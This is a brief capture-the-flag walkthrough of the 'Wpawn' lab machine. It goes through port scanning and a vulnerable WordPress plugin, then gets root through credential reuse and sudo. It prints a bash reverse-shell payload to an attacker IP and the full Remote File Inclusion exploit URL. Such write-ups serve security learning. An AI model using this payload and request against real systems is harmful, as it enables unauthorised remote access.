🐧Wpawn
192.168.84.123
Enumeration
sudo nmap 192.168.84.123 -sV -A -p-
Port 22
Banner grab
nc 192.168.84.123 22
Port 80
Running dirbuster to enumerate the website.
Found an interesting plugin being used.
There are known vulnerabilities for this plugin. https://wpscan.com/vulnerability/7b412469-cc03-4899-b397-38580ced5618\
Was able to get a reverse shell using the following.
Creating text file payload.txt and pulling it with Remote File Inclusion.
<pre>system("bash -c 'exec bash -i &>/dev/tcp/192.168.49.84/9966 <&1'")</pre>http://192.168.84.123/wordpress/wp-admin/post.php?swp_debug=load_options&swp_url=http://192.168.49.84:8000/payload.txtShell
Got a shell.
Found no interesting files. There is another user named takis. Dropped Linpeas in /tmp
Found credentials.
The found password works for takis' account, connected via ssh.
Running sudo -l
Root
Ran sudo su
Last updated
Was this helpful?